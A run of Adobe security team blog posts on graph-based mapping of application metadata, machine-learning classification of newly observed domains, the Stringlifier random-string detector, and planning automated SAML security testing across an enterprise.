John Lambert, Distinguished Engineer at the Microsoft Threat Intelligence Center, is often quoted as saying, “Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win.” This was one of the concepts that originally hooked me on the idea of exploring graphs in our tooling. There have been many examples of graph databases used to solve problems in network security, spam and fraud detection, and cloud configuration issues. These include open source tools such as Bloodhound AD, Grapl, and CloudMapper. There are also non-security use cases in the developer world, such as New Relic’s “Service Maps.” Graphs have even been argued to be a necessary component for moving machine learning to the next level. However, there are not many examples specific to web application security.

Graphs have proven useful in desktop application security for many years. Reverse engineers rely heavily on the visual call graph that tools like IDA Pro provide in order to understand the flow of the application. For web services, the closest example is the service diagram that application security researchers place at the top of every threat model. The challenge is that these static threat model diagrams are limited both in detail and in their ability to keep up with changing architectures. When threat modeling first began, architecture diagrams had a clear linear flow and often looked like this:

Today, micro-services have created hub-and-spoke models of multiple inputs and outputs. For large micro-service organizations, the network diagrams now look like this:

[Source: https://divante.com/blog/10-companies-that-implemented-the-microservice-architecture-and-paved-the-way-for-others/]

Different sources have quoted Netflix as having approximately 500-700 micro-services powering their company. This exceeds what humans can reasonably track manually with simple static diagrams.

Therefore, in order to track data through a complex system, we need more than static pictures of the conceptual representation of the service. We need the ability to dynamically interact with the graph through code. As John Lambert said in his blog, “Defenders should take a lesson from how attackers come to understand the graph. Attackers study the infrastructure as it is—not as an inaccurate mental model, viewed from an incomplete asset inventory system, or a dated network diagram. Manage from reality because that’s the prepared Defenders Mindset.” In the world of micro-services, the risk that an application diagram quickly becomes dated is significant.

Not only is it necessary to have a dynamic graph of the application flow that can be queried via code, it is also important to relate the meta information about the application that is distributed across different sources. If you work with a small team, this may not be complicated because there is one source repo and one production environment. You can take advantage of commercial products that can link static and dynamic analysis in these simplified environments.

Working within a large company, you will have hundreds of services, written in dozens of languages, and distributed across different cloud providers plus traditional data centers and CDNs. There is no single vendor tool that handles that complexity. The ability to identify an issue in source code, determine whether it is in production, and scan its environment, all via code within a scalable infrastructure, is critical. In order to accomplish that goal, organizations need to be able to programmatically link each team with their GitHub location, domain name, Jira queue, security tools, etc., in addition to dynamically representing how the services are connected to better understand data flow.

By collecting the metadata, organizations can both map the data flow and make it more robust. A traditional application dataflow diagram will simply show a box labeled with the name of the component. An enhanced data flow diagram could make it possible to see its GitHub location, the security tools tracking it, and other relevant information. This can make working with a development team much more efficient.

To make this possible, organizations need to ingest information from multiple sources into one database. This style of approach was previously used in the Marinus project, where domain information was pulled from multiple sources and correlated in a Mongo database. SQL databases tend to be more difficult to use when correlating data from disparate sources since there is no shared primary key. For this graph project, MongoDB could only be used as a temporary cache for the data since MongoDB is mostly designed to store data as independent records. Organizations should know how and why the data relates. Using table joins within an SQL database to relate the data assumes a consistent method of connecting the information. Since each team will have their data stored across a different subset of tools, there is no guarantee that the way in which the data is connected will be consistent.

This is where graph databases become the preferred approach. With graphs, data can be connected between any two vertices for whatever reason you deem appropriate for those two vertices. When performing a query, you can ask whether two pieces of information are related regardless of why they are related or how many degrees of separation exist between them. Graph databases provide a flexible way to search across complex relationships.
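As a neutral illustration of that point (using networkx here rather than any particular graph database), once heterogeneous records are linked as vertices and edges, “are these two things related?” becomes a simple path query, regardless of why or through how many hops they are connected. All of the identifiers below are hypothetical.

import networkx as nx

g = nx.Graph()
g.add_edge("service:image-processor", "repo:github.com/example/image-processor", reason="owns")
g.add_edge("service:image-processor", "domain:img.example.com", reason="serves")
g.add_edge("domain:img.example.com", "aws:123456789012", reason="hosted_in")
g.add_edge("repo:github.com/example/image-processor", "jira:IMG", reason="tracked_in")

finding = "repo:github.com/example/image-processor"
target = "aws:123456789012"
print(nx.has_path(g, finding, target))        # True - they are related
print(nx.shortest_path(g, finding, target))   # and here is how they connect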

Even in the very early stages of the project, mappings were created with only a small amount of code. Below is a screenshot from the first prototype of the tool. This diagram does not show the data flow between services. However, it does show the ability to connect metadata from many different sources into a single, linked representation. The tool first ingested data from a dozen different, disparate sources within the company and stored it in the graph. Next, the tool was able to identify that at least four of those systems had information for the service that I queried, and it produced a graph that linked together the metadata for that service:

Within this graph, organizations can now tie together the service name, GitHub location, AWS account, domain name, and contact information. This information alone is enough to allow us to complete the flow between finding a static analysis issue, testing for the issue on the domain where it is deployed, and filing an issue if the service is vulnerable. Most importantly, this can be done via code without any contextual knowledge of the service. This tool allows testing at scale across a wide range of services without pre-configuring data for each one.

Graphs aren’t the right tool for every problem, but they can be a valuable tool. In future blogs, we will discuss the technology stack that was used to build this project and the lessons that were learned while building it. We will also provide more complex examples of the different ways in which data can be linked together for different goals.

Peleus Uhley
Principal Scientist


Using Machine Learning to More Quickly Evaluate the Threat Level of External Domains


Most antivirus (AV) software is designed for home/personal use and can cover common scenarios. However, corporate networks must deal with preventing potential targeted attacks, which are crafted to get around security policies and standard AV vendors. Relying solely on external vendors to provide good security measures likely means ignoring the profiles of attackers that target your specific infrastructure. Also, the size of the internal network is directly proportional to the number of artifacts that need to be checked, which raises the issue of potential API limitations and scanning capacity when relying solely on AV providers. Thus, a complete security solution must rely both on external vendors and on a threat-specific model for your own company.

Our scope

Whether we are talking about unsuspecting users visiting malicious websites or being tricked into clicking malicious links in phishing emails, innocent user behaviors are a common vector for attacks. Attackers are also getting smarter by more directly monitoring these types of interactions to determine how the malicious attempts can be made more effective. Depending on the size of the network, an organization could potentially see several hundreds of thousands of unique domains accessed on a daily basis. Luckily, you don’t have to check all of them – you can take an incremental approach of only checking newly observed ones. Of course, a resource that was previously vetted could become compromised over time, but, with a healthy cache, you can re-add such resources into the cycle and check them periodically. This could potentially keep incrementing the number of domains you have to check in the long run, but keep in mind the dynamic behavior of browsing: some domains are only accessed once (the user never returns), others become trending and are frequently seen (you would expect that their owners also take security seriously and help make sure that they are not compromised), and domains that were trending at some point can fall back into anonymity and are not accessed anymore. In short, you may have to scale at some point, but it’s going to take a while before you get there.

But what are newly observed domains all about? For most of the AV vendors and passive DNS companies, newly observed domains represent web entities that were registered recently – a couple of days or maybe a couple of hours ago. This information might be an indicator that the domain might be worth investigating.

For the Adobe security team, NODs (newly observed domains) represent web resources that were accessed from Adobe infrastructure or from Adobe owned devices and that were never seen before in the Adobe logs. This means we are looking for NODs from an Adobe perspective and not from a broader web perspective. Now, even if you only focus on newly observed domains, you could still end up with tens of thousands per day. This is just how it is. This domain number is still likely to go beyond most API limitations of queries per day. Needless to say, you need a quicker way of reducing the number of domains scanned.

Generating NODs

Let us take a quick look at what NODs represent. As we mentioned, we are interested in seeing what new domains are contacted daily. We start this approach by looking through a variety of log sources, like proxy, DNS, or EDR-generated logs.

In order to initialize the process, we take the logs for a large period of time (one month) and build a list of all domains contacted in this period that are not part of the Cisco Umbrella “Top 1 Million” dataset. The result is going to be our initializer.

Then, the next day, we check all the domains that were contacted (using the same log sources) and that are not in the Cisco Top 1 Million or in the data collected previously. That generates the first day of NODs. We add those results to the initializer and repeat the same approach the next day.

This way, we have a daily list of all the unique newly observed domains, from an Adobe perspective.
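The bookkeeping itself is essentially set arithmetic: anything contacted today that is neither in the Cisco Umbrella “Top 1 Million” list nor in the set of previously seen domains becomes a NOD. The sketch below stubs out the log and list loading for illustration.

def load_top_1m():
    return {"google.com", "adobe.com"}                 # stand-in for the real Umbrella list

def domains_contacted(day_logs):
    return {entry["domain"] for entry in day_logs}     # extracted from proxy/DNS/EDR logs

top_1m = load_top_1m()
initial_month_logs = [{"domain": "internal-tool.example.net"}]
seen = domains_contacted(initial_month_logs) - top_1m  # the initializer

todays_logs = [{"domain": "adobe.com"}, {"domain": "suspicious-xyz.example.org"}]
nods = domains_contacted(todays_logs) - top_1m - seen  # today's newly observed domains
seen |= nods                                           # roll them into the baseline
print(nods)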

Knowing versus guessing

There are two broad categories of methods aimed at detecting if an item (domain, binary, script, etc.) represents a potential threat or not: signature-based methods and heuristic-based methods. Signature-based methods require prior identification and labeling of a potential threat, followed by hashing or signature creation. These types of methods are useful for accurately detecting well-established threats and they are less prone to error. However, emerging threats are best addressed by heuristic methods. These look for common threat behavioral patterns or try to detect anomalies in the way software/scripts/sites work.

Heuristic techniques employ either hand-crafted rules or automatically generated rules/patterns. This, in turn, can be supported by machine learning methods. Whatever the case, heuristic methods have a higher chance of generating false positives – mainly because of the blurred line between what is normal and what is abnormal software behavior. This includes websites that send data to third-party entities, text editors editing registry keys and accessing low-level system (kernel) functions, and plugins with a common behavior of hooking or loading libraries and sometimes even overwriting standard function calls. Thus, unless you can afford to rely solely on security policies that could potentially slow down the process, heuristically reported artifacts must be manually curated.

This brings us to another issue regarding the manual testing capacity of any company. The number of investigations that can be carried out in a specific timeframe is relatively small compared to the number of false positives generated by many heuristic methods. Just one source of truth from any open-source (OS) or commercial vendor is likely to overflow the work capacity of the security analyst team. To help mitigate this issue, we set out to create our own detection pipeline for newly observed domains, with the goal of reducing the number of false positives and reported artifacts to a more manageable number.

The solution involves three machine learning methods that independently assess if an artifact (in our case domain) is potentially malicious or not based on linearly independent features extracted from various vendors and OS data. Figure 1 shows the generic architecture of our system.

[NOTE: All data shown in this article is hypothetical training data that was used to prove the model and application.]

Importantly, the training data was specifically selected to be disjoint, in order to reduce the common bias of the three classifiers and the effect of mislabeled data from our sources of truth.

Here are some useful stats resulting from the training data (see Table 1, below). The total number of examples is around 2M, with 1.1M benign examples and almost 0.9M malicious.

Whenever possible, we tried to obtain the subclassification of malicious domains. As one can see from Table 1, we also include examples of domains related to mining in our dataset. The examples labeled as unknown (UNK) are either domains for which we could not get any subclassification from the data sources, or domains for which different sources had contradicting labels. In a real-world application, these would need to be investigated further.

Drill-down into the system

Figure 2 above shows the generic architecture of our detection pipeline. As already mentioned, our system relies on three classifiers that independently determine if a domain is malicious or not:

  1. Naming: the choice of words/letters used in the FQDN provides important information such as: (a) is the domain name the product of a domain-generation-algorithm (DGA) or is it manually created; (b) what was the domain created for (simple news, blogs, presentation sites or adult content, phishing, malware, freemium, ransomware)
  2. Meta information: indicators such as Google PageRank score, number of subdomains, geographic coverage, etc., reflect the legitimacy of a domain.
  3. Access profiles: trends in global access to the domain and specifically gaps or newly created domains with high-frequency access are extremely useful in the analysis.

Note: This type of approach is not new. However, by building our own system, we were able to focus on potential threats that are more pertinent to Adobe. We carefully selected the training data and included everything in our internal Threat Intelligence Platform. 

After experimenting with several machine-learning methods and techniques, we finally decided to use (a) a random forest for both meta-information and access profiles and (b) a character-level unidirectional Long Short-Term Memory (LSTM) network for the domain-name classifier.

We experimented with several normalization methods for the meta and access profile classifiers, but the best results were obtained with raw values. For the domain-name classifier, the best results were obtained by feeding the characters in reverse order and using the last cell state for classification, while also back-propagating an auxiliary loss for the subclass, which was masked out for the UNK labels.
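For illustration, a PyTorch sketch of a domain-name model along these lines is shown below: characters fed in reverse, the final cell state driving a malicious/benign head plus an auxiliary subclass head. The vocabulary size, dimensions, and layer choices are placeholders, not our production configuration.

import torch
import torch.nn as nn

class DomainNameClassifier(nn.Module):
    def __init__(self, vocab_size=64, embed_dim=32, hidden_dim=128, num_subclasses=8):
        super().__init__()
        self.embed = nn.Embedding(vocab_size, embed_dim, padding_idx=0)
        self.lstm = nn.LSTM(embed_dim, hidden_dim, batch_first=True)
        self.malicious_head = nn.Linear(hidden_dim, 2)               # benign vs malicious
        self.subclass_head = nn.Linear(hidden_dim, num_subclasses)   # phishing, DGA, miner, ...

    def forward(self, char_ids):
        reversed_ids = torch.flip(char_ids, dims=[1])   # feed the characters in reverse order
        embedded = self.embed(reversed_ids)
        _, (h_n, c_n) = self.lstm(embedded)
        last_cell = c_n[-1]                             # last cell state used for classification
        return self.malicious_head(last_cell), self.subclass_head(last_cell)

model = DomainNameClassifier()
batch = torch.randint(1, 64, (4, 40))                   # 4 domains, 40 characters each
main_logits, sub_logits = model(batch)
# The auxiliary subclass loss can be masked for UNK-labelled examples, e.g. via
# ignore_index in nn.CrossEntropyLoss.
print(main_logits.shape, sub_logits.shape)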

At least for two of the classifiers, the results on the development set look promising. However, we are talking about synthetically generated data. This poses two issues:

  1. The distribution of malicious/benign examples in the dataset does not reflect that of real data, thus the results are biased;
  2. We don’t know how data from external sources was collected by the third parties. They could have used some heuristics in their search, and this could lead to our own classifiers simply picking up the same heuristics, which would likely produce an incorrectly inflated accuracy figure on the development set (since it shares the same traits as the training dataset).

The best approach is to assess how the classifiers react to real-life data. However, there is no source of truth for this data, which makes it impossible to compute any accuracy or F-score automatically. To give some insight, Table 2 below shows the number of alarms triggered for the newly observed domains in a single day, in the following scenarios: (a) each individual classifier used on its own; (b) each pair of two classifiers voting the same verdict; and (c) all three classifiers unanimously agreeing on the verdict.

Setup                    Percent of detections
Naming                   23.10 %
Meta                     31.51 %
Access                   16.29 %
Naming+Meta              15.16 %
Naming+Access             8.30 %
Meta+Access              12.13 %
Naming+Meta+Access        6.54 %

Obviously, the smallest number of artifacts is generated by the unanimous vote of the three classifiers. While this is still a large number to investigate manually, it is far more manageable for sandbox testing APIs without exceeding daily quotas. By putting the “Naming+Meta+Access” domains through the sandbox testing service, we came up with a short list of 11 domains, which were then manually checked.

We have begun employing these techniques to help us perform much more efficient evaluations of external resources and their relative threat level. This information, combined with intelligence from our other efforts such as Tripod, continues to improve the robustness of our overall threat intelligence modeling.

Tiberiu Boros
Data Scientist/Machine Learning Engineer

Andrei Cotaie
Senior Security Engineer

Kumar Vikramjeet
Security Engineer

Leveraging Graphs to Improve Security Automation and Analysis


In my last blog, I gave the background for a research project where I am using graph databases to create graphs of application metadata to improve the efficiency of security automation.  In this blog, we will look at a few theoretical graphs to show their potential value. Essentially, what we are building in this series is a social network-style graph for your applications. Each application is a “profile” where you record its metadata and its connections throughout your organization. By interconnecting all of the application security and service-related data from across your organization, you can obtain far greater context regarding potential security risks than is possible with many existing techniques.  

Many social media platforms have a graph database as their back end since it is the most logical representation for what they are trying to achieve. People on social media networks are typically represented as nodes. Their potential likes and interests are also represented as nodes. The graph uses labeled edges to express the context of the connections between people and their interests. Edges can even have weights to express the strength of the connections.


These graphs can allow social media platforms to create a contextual view of a person by interconnecting the different parts of their life. We can use this same approach to create a better contextual understanding of our services at both the network and application layer. By having the full context, we can make better judgments in both automated and human review.

For instance, most firewall rules are just a list of IPs. If you work with a single network, then you probably have your network’s IPs memorized. However, if you work in a central security team with multiple networks, then that becomes difficult.

Therefore, as a hypothetical example, a review of firewall rules might give you only the following limited information regarding the allowed service-to-service communication between two public services:

    1.2.3.4 makes egress port 80 connections to 5.6.7.8

The use of port 80 is a bad security practice but, without context, it is hard to know the exact severity.  Instead, it would be more useful to have this information during a proactive review:

   1.2.3.4 (Image Processing Service) makes egress port 80 connections to 5.6.7.8 (auth.foo.com)

With this added context, it is now clear that the Image Processing Service is making an insecure network connection to an authentication service, which would be a significant risk. Obviously, you wouldn’t run an auth service on port 80, but this hypothetical example illustrates the point. Knowing who and what those IPs represent provides the context needed to make more informed decisions.

Obtaining that context requires mapping the IP to the account ID, domain name, and project. In addition, you would want to be able to map the project to an owner for quick remediation. If you work solely within a single account within a single cloud provider, such as AWS, then you may be able to get this information from Route53, AWS tags, and a collection of API queries. However, more complex environments will have multiple account IDs and may also be deployed across multiple cloud providers. This means that you must collect the information from multiple sources, and this is where creating a graph can help you create those links. A graph would allow you to build a model that might look like the image below:

Similarly, when doing an application layer security review, it would be ideal to have the complete context of an application in order to view it from a “single pane of glass”. This requires the ability to make connections between third-party library trackers, static analysis tools, JIRA entries, GitHub projects, cloud providers, and several other data sources. A graph representation of the relations between these data sources might look like the image below:

In these sample graphs, the edge labels, weights, and directions have been excluded for simplicity. The important takeaway is that it is possible to easily traverse from any point on the graph to any other point. Therefore, if you want to dig into a finding from a static analysis tool, you can link that finding to the IP and domain where it is hosted for further testing, as well as to the JIRA location where you will need to file any potential bugs. In the bottom left-hand corner, you can see that it is also possible to link this initial project with other projects that share matching properties. These types of connections would allow you to perform a breadth-based search across multiple projects based on the GitHub organization, cost center, or management contact. Graphs provide multiple options for contextualizing data from the perspective of any given data point.

Another important advantage of graphs is that building the graph doesn’t require you to have all your information neatly pre-organized. Many of the tools that contain the information used to build Adobe’s graphs are not designed to be cross-referenced. Instead, the graph is built like a puzzle. You start by creating small sub-components of the graph from the individual tools. At first, you are not quite sure how each piece will fit together with all the others. However, you keep connecting smaller structures into larger structures whenever you find a common property, until the final picture emerges.

For instance, perhaps the project name someone put into the static analysis tool doesn’t exactly match any of the names found in GitHub. It is not uncommon for someone to use an internal code name for the project in one tool and the public name of the project in another. This makes it impossible for code to link the two together based on name alone. However, if both data sources reference the same GitHub URL, then you will be able to connect the two sources in the graph, as illustrated in the sketch below.
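As a rough illustration of this puzzle-style assembly, the sketch below uses networkx (an assumed library choice; the blog does not prescribe a specific graph database) to merge two independently built sub-graphs that happen to share the same GitHub URL node; all node names are illustrative:

import networkx as nx

# Sub-graph built from the static analysis tool's export (illustrative names).
sast = nx.DiGraph()
sast.add_edge("sast-project:internal-codename", "github:https://github.com/org/repo", label="tracks_source")

# Sub-graph built from a GitHub organization inventory.
gh = nx.DiGraph()
gh.add_edge("github-project:public-name", "github:https://github.com/org/repo", label="hosted_at")
gh.add_edge("github-project:public-name", "owner:team-alias@example.com", label="owned_by")

# Because both sub-graphs use the same GitHub URL as a node identifier, composing
# them automatically links the internal code name to an owner via that shared node.
graph = nx.compose(sast, gh)
print(nx.has_path(graph.to_undirected(), "sast-project:internal-codename", "owner:team-alias@example.com"))  # True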

Chances are there will be some amount of redundancy, which means that if you couldn’t immediately link something based on one data source, you will be able to link it later using another. For instance, in the diagram above, there are two connections going into the domain name node. Let’s say that, for a given project, it was not possible to tie the project name directly to the domain name. That would be fine so long as a secondary path exists that uses the IP address to bridge the AWS account ID and the domain name. The more data sources you add, the more links you will be able to find, which creates redundancy.

This gives you the freedom not to worry about whether something connects at any individual stage of the process. Instead, you just keep adding data from different sources and adding links as you find them. You only worry about the final graph once all the data is added into the database.

Once the graph is created, any association that you can make in your mind by looking at a picture of the graph, you can also make via code. Using a graph query language, you can ask the question, “What is the domain name associated with this static analysis project?” The process will start at the node for the static analysis tool’s project and walk the graph until it finds the corresponding domain name node. These queries will not wander off into other projects if you were careful about the direction of your edges when creating the graph. The details of graph design will be discussed later in this series. The overall point is that a single query can make a dynamic correlation that might otherwise have taken multiple cross-references in a more traditional approach.
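Continuing that sketch (again using networkx as a stand-in; a dedicated graph database would expose an equivalent query language), the question above can be expressed as a simple directed traversal; node names remain illustrative:

import networkx as nx

# Illustrative chain: static analysis project -> GitHub repo -> AWS account -> IP -> domain.
graph = nx.DiGraph()
graph.add_edge("sast-project:image-processing", "github:https://github.com/org/image-proc")
graph.add_edge("github:https://github.com/org/image-proc", "aws-account:123456789012")
graph.add_edge("aws-account:123456789012", "ip:1.2.3.4")
graph.add_edge("ip:1.2.3.4", "domain:images.example.com")

def domain_for_sast_project(g, project_node):
    """Walk outgoing edges from the project node until a domain node is reached."""
    for node in nx.descendants(g, project_node):
        if node.startswith("domain:"):
            return node
    return None

print(domain_for_sast_project(graph, "sast-project:image-processing"))  # domain:images.example.com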

This makes graphs very powerful for both manual review and automation. With automation, you can use the data from your static analysis tool to trigger dynamic testing against domains in a targeted fashion. If you are performing a manual review, contextual information can allow you to work more efficiently as shown with the network example. In addition, by having all your security tool references as members of the graph, it is possible to create a “single pane of glass” UI for viewing all the relevant security information for a given project. You can examine the basics at a high level and then deep dive into respective tools using the reference recorded in the graph.

Overall, the graphs allow you to perform your analysis, either manually or through automated tools, with more efficiency and greater context. Rather than having security information dispersed across your organization in isolated silos, you can connect all of it into complete application profiles that provide you with all the necessary information to have a complete beginning to end workflow for analyzing and triaging issues. In my upcoming blogs, I will detail how you can build and query these graphs within your organization.

Peleus Uhley
Principal Scientist

Introducing Stringlifier – Adobe Security Team’s Latest Open Source Project


“1e32jnd9312”, “32189321-DEF3123-9898312”, “ADEFi382819312.” Do these strings seem familiar? They could be hashes, randomly generated passwords, API keys, or many other types of strings. You can usually spot them in logs, command lines, configuration files, and source code. Whether you are analyzing security and application logs or you are hunting for accidentally exposed credentials, they can, unfortunately, make your life a lot harder. This is because building a search pattern for something random is a particularly hard task.

Stringlifier is our latest open source project, and it can help you tackle this often-difficult task. The project is an open-source Python package that allows you to detect code or text that resembles a randomly generated string in any plain text. It uses machine learning to distinguish between normal and random character sequences. It can also be adapted for more fine-grained classifications (password, API key, hash, etc.).

The entire source code is available now in Adobe’s public GitHub repository. We also provide a “pip” (Python package installer) installation package that includes a pre-trained model.

Quick Tutorial

We did our best to make Stringlifier as easy-to-use as possible. To get started, you can simply install the module using pip.

$ pip install stringlifier

After this, all you have to do is import the API, create a new instance, and pass any string through it:

from stringlifier.api import Stringlifier
stringlifier = Stringlifier()
s = stringlifier('/System/Library/DriverExtensions/AppleUserHIDDrivers.dext/AppleUserHIDDrivers com.apple.driverkit.AppleUserUSBHostHIDDevice0 0x10000992d')

In this simple example, the results (stored in s) should be:

‘/System/Library/DriverExtensions/AppleUserHIDDrivers.dext/AppleUserHIDDrivers com.apple.driverkit.AppleUserUSBHostHIDDevice0 <RANDOM_STRING>’

And here is what happened under the hood:

 “0x10000992d” was replaced by a token labeled “<RANDOM_STRING>”. 

Why Stringlifier?

In some of our previous blogs, we spoke about finding anomalies in different datasets, and we also introduced an open source tool, Tripod, to help with this. In many cases, multiple datapoints contain long strings that we have to pre-process and convert into a numerical form before we can feed them into machine learning models. We have done this using a few approaches: BLEU scoring with custom clustering, TF-IDF with bag of words, TF-IDF using a byte-pair-encoding (BPE) approach with K-Means on top of it, and others. Grouping strings into robust clusters is really important for any of these approaches. But we have always hit a roadblock: random strings. Depending on the size of the random string relative to the full string, it can skew the result of the clustering algorithm and disrupt how the data is grouped.

For example, we are currently working to detect anomalies in datasets generated by one of Adobe’s other open source projects in daily active use here, HubbleStack: 

Let’s take the following command line as an example:

string = "/run/torcx/bin/docker --config /var/lib/mesos/slave/slaves/db2bb0dd-12b0-4167-a1cc-23ef4a4a4211-S1196/frameworks/db2bb0dd-12b0-4167-a1cc-23ef4a4a4211-0001/executors/bladerunner-sysdig.ec491d2d-b02e-11ea-899e-86449ab0c296/runs/162e0529-7244-4f9b-aaff-dd32d015514e/.docker run --privileged --userns=host -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro internaladobeurl.com/url/url:1.0.0"

This is a valid command line. However, if you take into consideration all the UUIDs present here, it becomes a total mess. Stringlifier can help us clean it up really fast:

s = stringlifier(string)

"/run/torcx/bin/docker --config /var/lib/mesos/slave/slaves/<RANDOM_STRING>-S1196/frameworks/<RANDOM_STRING>-0001/executors/bladerunner-sysdig.<RANDOM_STRING>/runs/<RANDOM_STRING>/.docker run --privileged --userns=host -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro internaladobeurl.com/url/url:1.0.0"

All of the random character sequences were replaced with <RANDOM_STRING>. This makes it easier to group similar types of command lines that employ random hashes in their parameters but otherwise have identical behavior and scope. Also, as a nice addition, the machine learning model correctly determined that “0001” and “S1196” are not part of random strings.
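As a rough sketch of that grouping step (the command lines and the counting logic are ours for illustration and not part of the Stringlifier API; str() is used so the grouping key is hashable regardless of the exact return type):

from collections import Counter
from stringlifier.api import Stringlifier

stringlifier = Stringlifier()

# Hypothetical command lines pulled from process logs; paths and IDs are illustrative.
command_lines = [
    "/usr/bin/job --run-id 7f3c2a9e-1b2d-4c5e-8f90-aa11bb22cc33",
    "/usr/bin/job --run-id 0d9e8c7b-6a5f-4e3d-2c1b-009988776655",
    "/usr/bin/other --token A81F3C9D2E",
]

# Sanitizing each line collapses the random parts, so identical templates group together.
templates = Counter(str(stringlifier(cmd)) for cmd in command_lines)
for template, count in templates.most_common():
    print(count, template)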

We hope you find Stringlifier useful. The entire source code is available in Adobe’s GitHub repository. You can also find all of our other open source projects from across Adobe’s security teams in that repository. We look forward to getting feedback, and contributions are always welcome.

Tiberiu Boros
Data Scientist/Machine Learning Engineer

Andrei Cotaie
Sr. Security Engineer

Kumar Vikramjeet
Security Engineer

Automating Enterprise SAML Security Tests – Part I


Single Sign-On (SSO) applications are becoming increasingly prevalent in organizations today. While there are many different SSO configuration types, Security Assertion Markup Language (SAML) is one of the most common in enterprise environments. Unfortunately, the current SAML 2.0 version is also old (introduced in 2005), complex, and prone to misconfiguration, which can result in critical authentication and authorization vulnerabilities. Most large organizations likely have hundreds or thousands of applications that have been configured with SAML over the past 15 years, and many new applications still choose to incorporate SAML over other options, like OAuth or Central Authentication Service (CAS). The combination of all these factors can often result in a gold mine of findings for security teams to uncover.

In light of a recent Adobe Security Blog post, Creatively Scaling Application Security Coverage and Depth, one can also recognize the importance of automating these types of projects that produce numerous high-impact findings. Not only do these findings help close potential security holes, but they also highlight where application security review processes can improve. As mentioned in that article, security teams can get creative in how they approach these tests and implement a process that is scalable, has low false positives, and can point to areas of improvement. Because of how SAML is incorporated into an existing environment, we have a valuable opportunity to programmatically analyze each workflow and follow up with better preventative controls.

In this blog post, we will explain in detail how an organization can gather an inventory of SAML-based applications, test for vulnerabilities in each workflow, and then effectively validate and report those findings with minimal false positives. We will also shed light on common mistakes that can complicate and slow down a project and provide useful tips and tricks that can help avoid these pitfalls. Lastly, we will outline some follow-up actions and controls that can be put into place after testing has been completed and offer a few side-project ideas that can be taken up alongside or after the initial project. Now, let’s dive into how to prepare for testing.

Scaling SAML Tests

Application Inventory

While many organizations suffer from inadequate application inventories, SAML environments fill that gap with a collection of pre-onboarded applications. In order to issue SAML login requests to applications or Service Providers (SPs), an Identity Provider (IDP) is configured to handle initial user authentication (typically against Active Directory) and then communicate that identity to each SP during the respective login. Regardless of the robustness and quality of an organization’s existing application inventory, IDPs house a well-formatted catalog of already-configured applications and contain all the information necessary for various kinds of SAML tests (see Figure 1). Completeness and uniformity of the application data found here facilitate automation of tests by providing Assertion Consumer Service (ACS) URLs and other SAML-specific information about onboarded applications. Whether it’s an in-house IDP or a SaaS product in use, there will be a database or API somewhere that can offer this inventory. 

In addition to an IDP that houses SAML applications and issues signed SAML Responses, SAML tests also require a test user in the IDP that has login permissions to all applications to be tested. While such “super accounts” go against the security best practice of limiting the number of powerful, privileged users, one is necessary in order to conduct tests at scale. A few ways to limit the risk that accompanies such a powerful IDP account are to temporarily enable the account during testing and disable it again when done, to use multi-factor authentication (MFA), and to limit the account’s permissions to read-only.

[Figure 1]

Finding SAML Vulnerabilities

As much research has already been conducted and shared regarding testing the security of SAML integrations, details regarding common vulnerabilities will not be expounded in this post. However, some resources and additional analysis around these issues and how they originate in an environment are provided at the end of this post under Appendix A.

Several SAML security tools are publicly available for manually testing single applications, but we have yet to find one that can test multiple SAML workflows back to back. Most public SAML tools are built for semi-manual usage, probably due to an effort to appeal to a wider, more diverse audience and because of the uniqueness of each test case. For example, different IDPs will each have their own distinct means of authentication, managing SAML inventory and application access, and issuing valid SAML Responses. Because of this, specialized tooling needs to be created for each unique environment that can drive the tests from beginning to end. In our case, we used Python to authenticate to our IDP and then produce valid SAML Responses for each active SAML application. We then incorporated a customized version of SAML Raider, a Burp Suite plugin, into our Python automation using Py4J in order to conduct various SAML tests. At this point, further specialized automation is needed to determine the correctness of findings.
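As a rough sketch of that Python-to-Java bridge (the gateway entry point and every method called on it are hypothetical stand-ins for whatever interface a customized SAML Raider build would expose):

from py4j.java_gateway import JavaGateway

# Connect to a JVM started with a Py4J GatewayServer that embeds the customized
# SAML Raider code; the entry point object and its methods are hypothetical.
gateway = JavaGateway()
saml_tester = gateway.entry_point

def run_tests_for_app(acs_url, signed_saml_response):
    """Ask the Java side to build and send tampered variants of a valid SAML Response."""
    results = []
    for test_name in saml_tester.listTestCases():                              # hypothetical
        payload = saml_tester.buildPayload(test_name, signed_saml_response)    # hypothetical
        results.append((test_name, saml_tester.send(acs_url, payload)))        # hypothetical
    return results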

Unfortunately, there are virtually infinite ways an application could respond to a SAML Response. In the case of a legitimate login, it could return a Set-Cookie or an authentication header, or it could return a session ID in the URL or in a hidden HTML input tag. Along the same lines, there are several different potential responses for a failed login, which could include different combinations of status codes, error messages, and redirects. It is highly unlikely that all of an organization’s applications respond to SAML Responses the same way, and this is especially true between different organizations. Thus, automated testing is most likely to be successful when using a combination of public tools and environment-specific code.

Potential Setbacks & Tips

During automation of SAML tests, there are several potential setbacks that engineers should be mindful of before starting:

  1. If no API is available for the IDP, then authenticating to it in order to retrieve the SAML inventory could prove challenging, especially if MFA is required. Full automation here may depend on the ability to programmatically approve MFA requests. This issue could also arise as SAML Responses are generated for SPs that require MFA approval in addition to the initial SAML factor. Depending on how many SPs in an IDP require MFA and whether the MFA can be automated, this could take a heavy toll on test speed and developer sanity! If MFA prompts are hindering a project, check whether there is a specialized utility account for automation that can automatically approve or bypass MFA restrictions to speed up testing. Otherwise, perhaps an MFA client could be installed on the laptop/server that runs the code, and the script could programmatically accept those MFA challenges.
  2. Discrepancies between private/public tool languages can require inventive workarounds to ensure code bases run smoothly together. For example, we used Py4J to allow our Python automation code to interact with our Java test code. Additionally, a lack of documentation and support for open source tools can slow down development and require additional work to maintain a secure, working state. Try to stick to well-vetted and maintained public tools where possible to avoid reinventing the wheel.
  3. A seemingly infinite variety of different responses to both good and bad SAML Responses means that it can be very hard to be 100% certain about the results of a test case. While some newer environments may strongly adhere to more modern, standard practices, like setting session cookies or Authentication headers, most companies probably have a mixture of older applications that handle authentication differently from one another. Verifying true and false positives by analyzing deviations from a legitimate login will be explored more in the next section. Keep this approach in mind as you start thinking about how to test.
